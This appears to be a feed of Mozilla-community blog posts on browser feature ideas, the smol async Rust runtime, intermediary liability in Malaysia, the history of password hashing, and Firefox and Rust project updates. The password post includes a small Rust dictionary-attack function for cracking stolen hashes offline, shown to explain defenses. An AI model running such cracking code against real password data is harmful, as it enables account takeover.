What I want: Content Management

Here I will be focusing on my own use case and needs.

What I would love is an “Apple Time Machine”-like for my browser, aka dated archives of my browsing session, with full text search.

  • Search through text keyword all tabs content, not only the title.
  • Possibility to filter search queries with time and uri. "Search this keyword only on wikipedia pages opened less than one week ago"
  • Tag tabs to create collections of content.
  • Archive the same exact uri at different times. Imagine the homepage of the NYTimes at different dates or times and keeping each version locally. (Webarchive is incomplete and online, I want it to work offline).
  • The storage format doesn't need to be the full stack of technologies of the current page. Opera Mini for example is using a format which is compressing the page as a more or less interactive image with limited capabilities.
  • You could add automation with an automatic backup of everything you are browsing, or have the possibility to manually select the pages you want to keep (like when you decide to pin a tab)
  • If the current computer doesn't have enough storage for your needs, an encrypted (paid) service could be provided where you would specify which page you want to be archived away and the ones that you want to keep locally.

Firefox becomes a portable bookshelf and the desk with the piles of papers you are working on.

Browser Innovation

Innovation in browsers doesn't have to be only about supported technologies; it can also be about features of the browser itself. I have the feeling that we have dropped the ball on many things, as we race to be transparent with regard to websites and applications. Technologies giving tools to web developers to create cool things are certainly very useful, but making the browser more useful for its immediate users is just as important. I don't want the browser to disappear into this mediating UI; I want it to give me more ways to manage and mitigate my interactions with the Web.

Slightly Related

Open tabs are cognitive spaces by Michail Rybakov.

It is time we stop treating websites as something solitary and alien to us. Web pages that we visit and leave open are artifacts of externalized cognition; keys to thinking and remembering.

The browser of today is a transitory space that brings us into a mental state, not just to a specific website destination. And we should design our browsers for this task.

Otsukare!


Karl Dubost: Browser Wish List - Tab Splitting for Contextual Reading

On Desktop, I'm very often in a situation where I want to read a long article in a browser tab, one with a certain number of hypertext links. Reading the text properly takes a tedious number of actions: it's prone to errors, requires a bit of preparation and involves a lot of manual actions.

The Why?

Take for example this article about The End of Tourism. There are multiple ways to read it.

  • We can read the text only.
  • We can click on each individual link when we reach it to open it in a background tab that we will check later.
  • We can click, read and come back to the main article.
  • We can open a new window and drag and drop the link to this new window.
  • We can ctrl+click to open a link in a new tab or a new window and then go to the context of this tab or window.

We can do better.

Having the possibility to read contextual information is useful for having a better understanding of the current article we are reading. Making this process accessible with only one click without losing the initial context would be tremendous.

What I Want: Tab Splitting For Contextual Reading

The "open a new window + link drag and drop" model of interactions is the closest of what I would like as a feature for reading things with hypertext links, but it's not practical.

  1. I want to be able to switch my current tab in a split tab either horizontally or vertically.
  2. Once the tab is in split mode, the first part shows the current article I'm reading. The second part is blank.
  3. Each time I'm clicking on a link in the first part (current article), it loads the content of the link in the second part.
  4. If I find that I want to keep the second part, I would be able to extract it in a new tab or new window.

This provides benefits for reading long forms with a lot of hypertext links. But you can imagine also how practical it could become for code browsing sites. It would create a very easy way to access another part of the code for contextual information or documentation.

There's nothing new required in terms of technologies to implement this. This is just browser UI manipulation and deciding in which context to display a link.

Otsukare!

Niko Matsakis: Async Interview #8: Stjepan Glavina

Several months ago, on May 1st, I spoke to Stjepan Glavina about his (at the time) new crate, smol. Stjepan is, or ought to be, a pretty well-known figure in the Rust universe. He is one of the primary authors of the various crossbeam crates, which provide core parallel building blocks that are both efficient and very ergonomic to use. He was one of the initial designers for the async-std runtime. And so when I read stjepang’s blog post describing a new async runtime smol that he was toying with, I knew I wanted to learn more about it. After all, what could make stjepang say:

It feels like this is finally it - it’s the big leap I was longing for the whole time! As a writer of async runtimes, I’m excited because this runtime may finally make my job obsolete and allow me to move onto whatever comes next.

If you’d like to find out, then read on!

Video

You can watch the video on YouTube. I’ve also embedded a copy here for your convenience:

What is smol?

smol is an async runtime, similar to tokio or async-std, but with a distinctly different philosophy. It aims to be much simpler and smaller. Whereas async-std offers a kind of “mirror” of the libstd API surface, but made asynchronous, smol tries to get asynchrony by wrapping and adapting synchronous components. There are two main ways to do this:

  • One option is to delegate to a thread pool. As we’ll see, stjepang argues that this option can be much more efficient than people realize, and that it makes sense for things like accesses to the local file system. smol offers the blocking! macro as well as adapters like the reader function, which converts impl Read values into impl AsyncRead values.
  • The other option is to use the Async<T> wrapper to convert blocking I/O sockets into non-blocking ones. This works for any I/O type T that is compatible with epoll (or its equivalent; on Mac, smol uses kqueue, and on Windows, smol uses wepoll).

Delegation to a thread pool

One of the debates that has been going back and forth when it comes to asynchronous coding is how to accommodate things that need to block. Async I/O is traditionally based on a “cooperative” paradigm, which means that if your thread is going to do blocking I/O – or perhaps even just execute a really long loop – you ought to use an explicit operation like spawn_blocking that tells the scheduler what’s going on.

Earlier, in the context of async-std, stjepang introduced a new async-std scheduler, inspired by Go. This scheduler would automatically determine when tasks were taking too long and try to spin up more threads to compensate. This was simpler to use, but it also had some downsides: it could be too pessimistic at times, creating spikes in the number of threads.

Therefore, in smol, stjepang returned to the approach of explicitly labeling your blocking sections, this time via the blocking! macro. This macro will move the “blocking code” out from the cooperative thread pool to one where the O/S manages the scheduling.

Explicit blocking is often just fine

In fact, you might say that the core argument of smol is that some mechanism like blocking! is often “good enough”. Rather than reproducing or cloning the libstd API surface to make it asynchronous, it is often just fine to use the existing API but with a blocking! adapter wrapped around it.

In particular, when interacting with the file system or with stdin/stdout, smol’s approach is based on blocking. It offers reader and writer adapters that move that processing to another thread.
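To make the thread-delegation idea concrete, here is a minimal conceptual sketch of the general pattern, assuming the futures crate for the oneshot channel. This is not smol’s actual implementation of blocking! or of the reader/writer adapters: the run_blocking name is hypothetical, and a real runtime would hand the closure to a managed thread pool rather than spawn a fresh OS thread per call.

use futures::channel::oneshot;
use std::thread;

// Hypothetical sketch of delegating a blocking call to another thread so that
// the async task merely awaits the result. A real runtime (like smol's
// blocking machinery) would reuse a pool of threads instead of spawning one.
async fn run_blocking<T, F>(work: F) -> T
where
    F: FnOnce() -> T + Send + 'static,
    T: Send + 'static,
{
    let (tx, rx) = oneshot::channel();
    thread::spawn(move || {
        // The blocking work runs off the cooperative executor threads.
        let _ = tx.send(work());
    });
    // The async task parks here without blocking an executor thread.
    rx.await.expect("worker thread dropped the result")
}

Inside an async task you would then write something like let contents = run_blocking(|| std::fs::read_to_string("notes.txt")).await; (the file name is just an illustration).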

The Async wrapper

But of course if you were spawning threads for all of your I/O, this would defeat the purpose of using an async runtime in the first place. Therefore, smol offers another approach, the Async<T> wrapper.

The idea of Async<T> is that you can take a blocking abstraction, like the TcpStream found in the standard library, and convert it to be asynchronous by creating a Async<TcpStream>. This works for any type that supports the AsRawFd trait, which gives access to the underlying file descriptor. We’ll explain that in a bit.

So what can you do with an Async<TcpStream>? The core operations that Async<T> offers are the async functions read_with and write_with. They allow you to wrap blocking operations and have them run asynchronously. For example, given a socket of type Async<UdpSocket>, you might write the following to send data asynchronously:

let len = socket.write_with(|s| s.send(msg)).await?;

How the wrappers work: epoll

So how do these wrappers work under the hood? The idea is quite simple, and it’s connected to how epoll works. The idea with a traditional Unix non-blocking socket is that it offers the same interface as a blocking one: i.e., you still invoke functions like send. However, if the kernel would have had to block, and the socket is in non-blocking mode, then it simply returns an error code instead. Now the user’s code knows that the operation wasn’t completed and it can try again later (in Rust, this is io::ErrorKind::WouldBlock). But how does it know when to try again? The answer is that it can invoke epoll to find out when the socket is ready to accept data.

The read_with and write_with methods build on this idea. Basically, they execute your underlying operation just like normal. But if that operation returns WouldBlock, then the function will register the underlying file descriptor (which was obtained via AsRawFd) with smol’s runtime and yield the current task. smol’s reactor will invoke epoll and when epoll indicates that the file descriptor is ready, it will start up your task, which will run your closure again. Hopefully this time it succeeds.

If this seems familiar, it should. Async<T> is basically the same as the core Future interface, but “specialized” to the case of pollable file descriptors that return WouldBlock instead of Poll::Pending. And of course the core Future interface was very much built with interfaces like epoll in mind.
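Here is a minimal conceptual sketch of that retry loop. It is not smol’s actual source: the with_retry name and the wait_ready callback are hypothetical stand-ins for smol’s internal reactor registration, which registers the file descriptor (obtained via AsRawFd) with epoll/kqueue/wepoll and wakes the task when it is ready.

use std::future::Future;
use std::io;

// Conceptual sketch of what read_with/write_with do: try the blocking call,
// and if the kernel reports WouldBlock, suspend the task until the file
// descriptor is ready, then try the exact same call again.
async fn with_retry<T, R, Fut>(
    io_handle: &T,
    mut op: impl FnMut(&T) -> io::Result<R>,
    mut wait_ready: impl FnMut() -> Fut,
) -> io::Result<R>
where
    Fut: Future<Output = io::Result<()>>,
{
    loop {
        match op(io_handle) {
            Err(e) if e.kind() == io::ErrorKind::WouldBlock => {
                // Yield this task; the reactor wakes it once epoll (or
                // kqueue/wepoll) reports the file descriptor as ready.
                wait_ready().await?;
            }
            res => return res,
        }
    }
}

Async<T>’s read_with and write_with are essentially this loop specialized to “readable” and “writable” readiness on the wrapped file descriptor.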

Ergonomic wrappers

The read_with and write_with wrappers are very general but not the most convenient to use. Therefore, smol offers some “convenience impls” that basically wrap existing methods for you. So, for example, given my socket: Async<UdpSocket>, earlier we saw that I can send data with write_with:

let len = socket.write_with(|s| s.send(msg)).await?;

but I can also invoke socket.send directly:

let len = socket.send(msg).await?;

Under the hood, this just delegates to a call to write_with.
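
Conceptually, that convenience method is little more than the following helper, written here as a free function purely for illustration (in smol itself it is a method on Async<UdpSocket>):

use smol::Async;
use std::io;
use std::net::UdpSocket;

// The "ergonomic" send is a thin forwarding layer over write_with.
async fn send(socket: &Async<UdpSocket>, msg: &[u8]) -> io::Result<usize> {
    socket.write_with(|s| s.send(msg)).await
}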

Bridging the sync vs async worlds

stjepang argues that basing the runtime around this idea of “bridging” not only makes for a smaller runtime, but also has the potential to help bridge the gap between the “sync” and “async” worlds. Basically, users today have to choose: do they base their work around the synchronous I/O interfaces, like Read and Write, or the asynchronous ones? The former are more mature and there are a lot of libraries available that build on them, but the latter seem to be the future.

smol presents another option. Rather than converting all libraries to async, you can just adapt the synchronous libraries into the async world, either through Async<T>, where that applies, or through the blocking adapters like reader or writer.

We walked through the example of the inotify crate. This is an existing library that wraps the inotify interface in the Linux kernel in idiomatic Rust. It is written in a synchronous style, however, and so you might think that if you are writing async code, you can’t use it. However, its core type implements AsRawFd. That means that you can create an Async<Inotify> instance and invoke all its methods by using the read_with or write_with methods (or create ergonomic wrappers of your own).
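
Here is a speculative sketch of what that might look like. The inotify crate calls (Inotify::init, add_watch, read_events) and the read_with_mut variant used for mutable access are written from memory and should be treated as assumptions; check the crate and smol docs before relying on this.

use inotify::{Inotify, WatchMask};
use smol::Async;
use std::io;

// Hypothetical: drive a synchronous Inotify handle from async code by wrapping
// it in Async<T>, which works because Inotify exposes its fd via AsRawFd.
async fn watch_for_changes(path: &str) -> io::Result<()> {
    let mut inotify = Inotify::init()?;             // plain, synchronous setup
    inotify.add_watch(path, WatchMask::MODIFY)?;    // register interest
    let mut inotify = Async::new(inotify)?;         // hand the fd to the reactor

    let mut buffer = [0u8; 4096];
    loop {
        // Assumes read_events is non-blocking and returns WouldBlock when
        // nothing is pending, so the wrapper retries on epoll readiness.
        let count = inotify
            .read_with_mut(|i| i.read_events(&mut buffer).map(|events| events.count()))
            .await?;
        println!("{} file system events", count);
    }
}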

Digging into the runtime

In the video, we spent a fair amount of time digging into the guts of how smol is implemented. For example, smol never starts threads on its own: instead, users start their own threads and invoke functions from smol that put those threads to work. We also looked at the details of its thread scheduler, and compared it to some of the recent work towards a new Rayon scheduler that is still pending. (Side note, there’s a recorded deep dive on YouTube that digs into how the Rayon scheduler works, if that’s your bag). In any case, we kind of got into the weeds here, so I’ll spare you the details. You can watch the video. =)

The importance of auditing and customizing

One interesting theme that we came to later is the importance of being able to audit unsafe code. stjepang mentioned that he has often heard people say that they would be happy to have a runtime that doesn’t achieve peak performance, if it makes use of less unsafe code.

In fact, I think one of the things that stjepang would really like to see is people taking smol and, rather than using it directly, adapting it to their own codebases. Basically using it as a starting point to build your own runtime for your own needs.

Towards a generic runtime interface?

It’s not a short-term thing, but one of the things that I personally am very interested in is getting a better handle on what a “generic runtime interface” looks like. I’d love to see a future where async runtimes are like allocators: there is a default one that works “pretty well” that you can use a lot of the time, but it’s also really easy to change that default and port your application over to more specialized allocators that work better for you.

I’ve often imagined this as a kind of trait that encapsulates the “core functions” a runtime would provide, kind of like the GlobalAlloc trait for allocators. But stjepang pointed out that smol suggests a different possibility, one where the std library offers a kind of “mini reactor”. This reactor would offer functions to “register” sockets, associate them with wakers, and a function that periodically identifies things that can make progress and pushes them along. This wouldn’t in and of itself be a runtime, but it would be a building block that other runtimes can use.
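
To make that idea a bit more concrete, here is a purely speculative sketch of what such a “mini reactor” interface might look like; none of these names exist today, and this is only a paraphrase of the idea, not anything stjepang actually proposed in code:

use std::io;
use std::os::unix::io::RawFd;
use std::task::Waker;

// Hypothetical building block: just enough surface area for different runtimes
// to plug their I/O types into a shared, std-provided reactor.
trait MiniReactor {
    /// Start tracking readiness events for a file descriptor.
    fn register(&self, fd: RawFd) -> io::Result<()>;
    /// Associate a waker to be invoked when the descriptor becomes ready.
    fn set_waker(&self, fd: RawFd, waker: Waker) -> io::Result<()>;
    /// Poll the OS (e.g. via epoll) and wake tasks whose descriptors are
    /// ready, returning how many wakeups happened.
    fn turn(&self) -> io::Result<usize>;
    /// Stop tracking a descriptor when its I/O object goes away.
    fn deregister(&self, fd: RawFd) -> io::Result<()>;
}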

Anyway, as I said above, I don’t think we’re at the point where we know what a generic runtime interface should look like. I’m particularly a bit nervous about something that is overly tied to epoll, given all the interesting work going on around adapting io-uring (e.g., withoutboat’s Ringbahn) and so forth. But I think it’s an interesting thing to think about, and I definitely think smol stakes out an interesting point in this space.

Conclusion

My main takeaways from this conversation were:

  • The “core code” you need for a runtime is really very little.
  • Adapters like Async<T> and offloading work onto thread pools can be a helpful and practical way to unify the question of sync vs async.
  • In particular, while I knew that Futures were conceptually quite close to epoll, I hadn’t realized how far you could get with a generic adapter like Async<T>, which maps between the I/O WouldBlock error and the Poll::Pending future result.
  • In thinking about the space of possible runtimes, we should be considering not only things like efficiency and ergonomics, but also the total amount of code and our ability to audit and understand it.

Comments?

There is a thread on the Rust users forum for this series.

Mozilla Open Policy & Advocacy BlogCriminal proceedings against Malaysiakini will harm free expression in Malaysia

The Malaysian government’s decision to initiate criminal contempt proceedings against Malaysiakini for third party comments on the news portal’s website is deeply concerning. The move sets a dangerous precedent against intermediary liability and freedom of expression. It ignores the internationally accepted norm that holding publishers responsible for third party comments has a chilling effect on democratic discourse. The legal outcome the Malaysian government is seeking would upend the careful balance which places liability on the bad actors who engage in illegal activities, and only holds companies accountable when they know of such acts.

Intermediary liability safe harbour protections have been fundamental to the growth of the internet. They have enabled hosting and media platforms to innovate and flourish without the fear that they would be crushed by a failure to police every action of their users. Imposing the risk of criminal liability for such content would place a tremendous, and in many cases fatal, burden on many online intermediaries while negatively impacting international confidence in Malaysia as a digital destination.

We urge the Malaysian government to drop the proceedings and hope the Federal Court of Malaysia will meaningfully uphold the right to freedom of expression guaranteed by Malaysia’s Federal Constitution.

 

The post Criminal proceedings against Malaysiakini will harm free expression in Malaysia appeared first on Open Policy & Advocacy.

The Mozilla BlogA look at password security, Part I: history and background

Today I’d like to talk about passwords. Yes, I know, passwords are the worst, but why? This is the first of a series of posts about passwords, with this one focusing on the origins of our current password systems, starting with login for multi-user systems.

The conventional story for what’s wrong with passwords goes something like this: Passwords are simultaneously too long for users to memorize and too short to be secure.

It’s easy to see how to get to this conclusion. If we restrict ourselves to just letters and numbers, then there are about 2^6 one-character passwords, 2^12 two-character passwords, etc. The fastest password cracking systems can check about 2^36 passwords/second, and a year is roughly 2^25 seconds, so if you want a password which takes a year to crack, you need around 61 bits’ worth of guessing work, which at about 6 bits per character means a password 10 characters long or longer.

The situation is actually far worse than this; most people don’t use randomly generated passwords because they are hard to generate and hard to remember. Instead they tend to use words, sometimes adding a number, punctuation, or capitalization here and there. The result is passwords that are easy to crack, hence the need for password managers and the like.

This analysis isn’t wrong, precisely; but if you’ve ever watched a movie where someone tries to break into a computer by typing passwords over and over, you’re probably thinking “nobody is a fast enough typist to try billions of passwords a second”. This is obviously true, so where does password cracking come into it?

How to design a password system

The design of password systems dates back to the UNIX operating system, designed back in the 1970s. This is before personal computers and so most computers were shared, with multiple people having accounts and the operating system being responsible for protecting one user’s data from another. Passwords were used to prevent someone else from logging into your account.

The obvious way to implement a password system is just to store all the passwords on the disk and then when someone types in their password, you just compare what they typed in to what was stored. This has the obvious problem that if the password file is compromised, then every password in the system is also compromised. This means that any operating system vulnerability that allows a user to read the password file can be used to log in as other users. To make matters worse, multiuser systems like UNIX would usually have administrator accounts that had special privileges (the UNIX account is called “root”). Thus, if a user could compromise the password file they could gain root access (this is known as a “privilege escalation” attack).

The UNIX designers realized that a better approach is to use what’s now called password hashing: instead of storing the password itself, you store what’s called a one-way function of the password. A one-way function is just a function H that’s easy to compute in one direction but not the other.1 This is conventionally done with what’s called a hash function, and so the technique is known as “password hashing” and the stored values as “password hashes”.

In this case, what that means is you store the pair: (Username, H(Password)). [Technical note: I’m omitting salt, which is used to mitigate offline pre-computation attacks against the password file.] When the user tries to log in, you take the password they enter P and compute H(P). If H(P) is the same as the stored hash, then you know their password is right (with overwhelming probability) and you allow them to log in; otherwise you return an error. The cool thing about this design is that even if the password file is leaked, the attacker learns only the password hashes.2
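
As a minimal sketch of this scheme (assuming the sha2 crate for H, and omitting salt just like the note above; a bare fast hash is used only to keep the example short, not as a recommendation):

use sha2::{Digest, Sha256};
use std::collections::HashMap;

// Toy password "file": username -> H(password).
#[derive(Default)]
struct PasswordFile {
    hashes: HashMap<String, Vec<u8>>,
}

impl PasswordFile {
    fn set_password(&mut self, user: &str, password: &str) {
        let digest = Sha256::digest(password.as_bytes()).to_vec();
        self.hashes.insert(user.to_string(), digest);
    }

    // Login check: hash the attempt and compare it to the stored hash.
    fn check_password(&self, user: &str, attempt: &str) -> bool {
        let digest = Sha256::digest(attempt.as_bytes()).to_vec();
        self.hashes.get(user).map_or(false, |stored| stored == &digest)
    }
}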

Problems and countermeasures

This design is a huge improvement over just having a file with cleartext passwords, and it might seem at this point like you don’t need to stop people from reading the password file at all. In fact, on the original UNIX systems where this design was used, the /etc/passwd file was publicly readable. However, upon further reflection, it has the drawback that it’s cheap to verify a guess for a given password: just compute H(guess) and compare it to what’s been stored. This wouldn’t be much of an issue if people used strong passwords, but because people generally choose bad passwords, it is possible to write password cracking programs which would try out candidate passwords (typically starting with a list of common passwords and then trying variants) to see if any of these matched. Programs to do this task quickly emerged.

The key thing to realize is that the computation of H(guess) can be done offline. Once you have a copy of the password file, you can compare your pre-computed hashes of candidate passwords against the password file without interacting with the system at all. By contrast, in an online attack you have to interact with the system for each guess, which gives it an opportunity to rate limit you in various ways (for instance by taking a long time to return an answer or by locking out the account after some number of failures). In an offline attack, this kind of countermeasure is ineffective.
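
To see why the offline setting is so favorable to the attacker, here is a toy dictionary attack, again assuming the sha2 crate as above; every guess is a single local hash computation, with nothing for the server to rate limit:

use sha2::{Digest, Sha256};

// Toy offline attack: hash each candidate and compare it to a stolen hash.
fn crack(stolen_hash: &[u8], wordlist: &[&str]) -> Option<String> {
    for guess in wordlist {
        if Sha256::digest(guess.as_bytes()).as_slice() == stolen_hash {
            return Some(guess.to_string());
        }
    }
    None
}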

There are three obvious defenses to this kind of attack:

  • Make the password file unreadable: If the attacker can’t read the password file, they can’t attack it. It took a while to do this on UNIX systems, because the password file also held a lot of other user information that needed to stay world-readable, but eventually the hashes got split out into another file in what’s called “shadow passwords” (the passwords themselves are stored in /etc/shadow). Of course, this is just the natural design for Web-type applications where people log into a server.
  • Make the password hash slower: The cost of cracking is linear in the cost of checking a single password, so if you make the password hash slower, then you make cracking slower. Of course, you also make logging in slower, but as long as you keep that time reasonably short (below a second or so) then users don’t notice. The tricky part here is that attackers can build specialized hardware that is much faster than the commodity hardware running on your machine, and designing hashes which are thought to be slow even on specialized hardware is a whole subfield of cryptography. (A minimal sketch of the basic idea follows this list.)
  • Get people to choose better passwords: In theory this sounds good, but in practice it’s resulted in enormous numbers of conflicting rules about password construction. When you create an account and are told you need to have a password between 8 and 12 characters with one lowercase letter, one capital letter, a number and one special character from this set — but not from this other set — what they’re hoping you will do is create a strong password. Experience suggests you are pretty likely to use Passw0rd!, so the situation here has not improved that much unless people use password managers which generate passwords for them.
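
Returning to the second point above, here is a deliberately naive sketch of making the hash slower by iterating it (again assuming the sha2 crate); real systems use purpose-built constructions such as bcrypt, scrypt, Argon2 or PBKDF2, which this loop only gestures at:

use sha2::{Digest, Sha256};

// Naive key stretching: each extra iteration multiplies the attacker's cost
// per guess (and the defender's cost per login) by the same factor.
fn slow_hash(password: &[u8], iterations: u32) -> Vec<u8> {
    let mut digest = Sha256::digest(password).to_vec();
    for _ in 0..iterations {
        digest = Sha256::digest(digest.as_slice()).to_vec();
    }
    digest
}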

The modern setting

At this point you’re probably wondering what this has to do with you: almost nobody uses multiuser timesharing systems any more (although a huge fraction of the devices people use are effectively UNIX: macOS is a straight-up descendant of UNIX, and Linux and Android are UNIX clones). The multiuser systems that people do use are mostly Web sites, which of course use usernames and passwords. In future posts I will cover password security for Web sites and personal devices.


  1. Strictly speaking we need the function not just to be one-way but also to be preimage resistant, meaning that given H(P) it’s hard to find any input p such that H(p) == H(P).
  2. For more information on this, see Morris and Thompson for a quite readable history of the UNIX design. One very interesting feature is that at the time this system was designed, generic hash functions didn’t exist, and so they instead used a variant of DES. The password was converted into a DES key and then used to encrypt a fixed value. This is actually a pretty good design and even included a feature designed to prevent attacks using custom DES hardware. However, it had the unfortunate property that passwords were limited to 8 characters, necessitating new algorithms that would accept a longer password.

The post A look at password security, Part I: history and background appeared first on The Mozilla Blog.

Firefox NightlyThese Weeks in Firefox: Issue 75

Highlights

  • We’ve added a new section to about:preferences to opt-in to experimental features!
    • Go to about:preferences, and look for “Experiments” on the left-hand side.
    • The Nightly Experiments pane in about:preferences showing several experiments that users can toggle.

      Feeling experimental? Check these options out!

  • Firefox Lockwise (about:logins) now supports Login Export to a .csv file
    • The “Export Logins…” menu item in the menu of about:logins

      Your data is yours – so take your passwords and do what you will with them.

  • There’s a new WebRTC global sharing indicator enabled on Nightly!
    • The new WebRTC global sharing indicator in Nightly. The indicator shows that the user is sharing their microphone, camera and a Nightly window.

      This indicator can be dragged anywhere on screen and minimized, and works on all desktop platforms.

    • Noticed any issues? File bugs against this metabug for us to triage.
  • We need more Nightly users to help us test Fission!
    • Original announcement requesting testers on dev-platform
    • The team will soon add Fission to the about:preferences Experiments section, but in the meantime, you can opt-in to trying it by going to about:config and setting fission.autostart to true, and restarting
  • The DevTools team has merged the Messages side panel into the Response side panel (bug) in the Network tool. So, WebSocket frames are now displayed in the Response panel
    • The Network tool showing some WebSocket frames appearing in the Response panel.

Friends of the Firefox team

Resolved bugs (excluding employees)

Fixed more than one bug

  • ariasuni
  • Farooq AR
  • Itiel
  • kenrick95
  • Kriyszig
  • Kyle Knaggs
  • manas
  • Mark Smith [:mcs]
  • petcuandrei
  • Richard Sherman :rich :richorrichard
  • Sebastian Zartner [:sebo]
  • Sonia
  • Stepan Stava [:stepan]

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
WebExtension APIs
  • Fixed regressions:
    • Mak fixed a regression in the downloads API that would cause valid downloads to fail (Bug 1637973, originally regressed by Bug 1598216)
    • Rob fixed a regression related to the ability of webRequest API listeners to modify CSP headers on intercepted requests (Bug 1635781, regressed by Bug 1462989)
  • Contributions:
    • Starting from Firefox 79, a new browser.tabs.warmup API method is available to WebExtensions (Bug 1402256). Extensions can use this method to improve user-perceived performance when switching between tabs. Thanks to ariasuni for contributing this enhancement!
    • In Firefox 79, the browser.tabs.duplicate API method now ensures that duplicated tabs are created as active, as in Chrome (Bug 1376088). Thanks ariasuni
    • dpk contributed a patch to improve error messages when invalid patterns are used in browser.tabs.query (Bug 1637431)
    • Sonia Singla contributed a patch to not show the WebExtensions contextMenu related to bookmarks on entries without a bookmarkGuid (Bug 1638360)
    • Myeongjun Go contributed a patch to allow localhost HTTP URLs as search providers defined in a WebExtension manifest
    • Harsh contributed a patch to allow extensions to observe and modify requests created using the browser.downloads.download API (Bug 1579911)
Addon Manager & about:addons
  • Removed built-in certificate requirement for addon updates and installs when signed extensions are required (Bug 1308251)
  • other issues and/or regressions fixed in AOM and about:addons:
    • error logged when non-extension add-ons or the browser are being updated (Bug 1643854, regressed by Bug 1618500)
    • addon install cancellation ignored when the addon has been already downloaded (Bug 1559683)
    • addon details page not loaded as expected when clicking the add-on title in the about:addons list view (Bug 1645286)
    • missing select dropdown in extensions options_ui page when embedded into a about:addons page (Bug 1647727)

Developer Tools

  • Remote Debugging – Added forward, back, and refresh buttons to the remote debugging experience (bug)
    • The remote debugging interface showing some back and forward toolbar buttons to the left of the URL input.
  • Console Panel – 4XX and 5XX requests are now displayed as error in the console, and don’t need the Request/XHR filter to be enabled (bug)
    • A 500 Internal Server Error and a 400 Bad Request error appearing by default in the console.
  • Accessibility – Several improvements for a11y contributed by MarcoZ. More parts of the DevTools UI are now accessible to screen readers (bug, bug, bug, bug)
  • Console Panel – Blocked requests have a distinct style in the console (bug)
    • A series of requests being logged in the DevTools console. One of them has a crossed-out icon and different colouring to indicate that it was a blocked request. On the right side, a “Tracking” label has been applied to indicate that the request was blocked due to it being for a tracking script.
  • Debugger Panel – Debugger shows also sources cleaned up by GC (bug)
  • Network Panel – Slow requests are marked with a turtle icon. A request counts as slow when waiting for the server response takes more than 500 ms (bug). The default threshold is stored in devtools.netmonitor.audits.slow
    • A series of network requests in the Network panel. Some of them have icons of turtles after the resource name to indicate that the responses returned slowly.
  • Network Panel – support for Server-Sent Events (SSE) coming in 80. Visualization for text/event-stream content types (bug, test page). Hidden behind a pref: devtools.netmonitor.features.sse
    • A Server-Sent Events endpoint is showing incoming event data via the Response panel in the Network inspector. The data is a mixture of raw strings (“Hello world”) and JSON.

Fission

Password Manager

PDFs & Printing

Performance

Performance Tools

Remote Protocol (Chrome DevTools Protocol subset)

  • When navigating to web pages with iframes included, all relevant page navigation events are now sent out for each and every frame. Various other small fixes were necessary to get this finished. The formerly added preference remote.frames.enabled is no longer necessary because frame handling is now enabled by default.
  • For the next while, the team will be focused on making Marionette Fission compatible. In the meantime, we’ll be gathering feedback from Puppeteer users and anyone else experimenting with Remote Protocol before we resume our work in that area.

Search and Navigation

Search:

  • Some reliability fixes for modern configuration.
  • Post-modern cleanup is now underway and is currently reworking how the search engine cache and initialization routines are handled.
  • Region detection
    • We’re now experimenting with doing regular checks for your region and updating it if you’ve changed location for more than a couple of weeks (previously the region was static unless we explicitly reset it) – Bug 1627555
    • Better support to customize params depending on the region – Bug 1634580
    • Experiment will run in Beta to check reliability

Address Bar:

  • Address bar expansion on focus now obeys prefers-reduced-motion – Bug 1629303
  • On Windows it’s now possible to close the results panel by clicking on the toolbox draggable space – Bug 1628948
  • Fixed a regression where search suggestions were not provided anymore when restricting to search (with “?” or an alias) – Bug 1648385
  • Search suggestions will now be shown for a broader range of search strings (but not when the typed string looks like a URL) – Bug 1628079
  • Search history is enabled by default in Firefox 78 and obeys the same preference as normal search suggestions – Bug 1643475
  • Fixed a bug where certain domains (like “pserver”) may be transformed into others when typed and confirmed without a protocol – Bug 1646928
  • A new browser.urlbar.dnsResolveSingleWordsAfterSearch preference allows to disable post-facto DNS resolution of single word searches that may be valid intranet names – Bug 1642943
  • Restriction tokens at the end of the search string are considered only if they are preceded by a space (Searching for “c++” now works correctly) – Bug 1636961
  • Tail search suggestions are enabled in EARLY_BETA_OR_EARLIER; release enabling is pending a Firefox 78 experiment – Bug 1645059 (demo: search for “hobbit holes for sale in i”)

WebRTC UI

Mozilla Addons BlogAdditional JavaScript syntax support in add-on developer tools

When an add-on is submitted to Firefox for validation, the add-ons linter checks its code and displays relevant errors, warnings, or friendly messages for the developer to review. JavaScript is constantly evolving, and when the linter lags behind the language, developers may see syntax errors for code that is generally considered acceptable. These errors block developers from getting their add-on signed or listed on addons.mozilla.org.

Example of JavaScript syntax error

On July 2, the linter was updated from ESLint 5.16 to ESLint 7.3 for JavaScript validation. This upgrades linter support to most ECMAScript 2020 syntax, including features like optional chaining, BigInt, and dynamic imports. As a quick note, the linter is still slightly behind what Firefox allows. We will post again in this blog the next time we make an update.

Want to help us keep the linter up-to-date? We welcome code contributions and encourage developers to report bugs found in our validation process.

The post Additional JavaScript syntax support in add-on developer tools appeared first on Mozilla Add-ons Blog.

This Week In RustThis Week in Rust 346

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Check out this week's This Week in Rust Podcast

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is suckit, a tool to recursively download a website.

Thanks to Martin Schmidt for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No issues were proposed for CfP.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

308 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-07-07. One unimportant regression on a rollup; six improvements, two on rollups.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

No RFCs were approved this week.

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Rust is like a futuristic laser gun with an almost AI-like foot detector that turns the safety on when it recognises your foot.

u/goofbe on reddit

Thanks to Synek317 for the suggestions!

Please submit quotes and vote for next week!

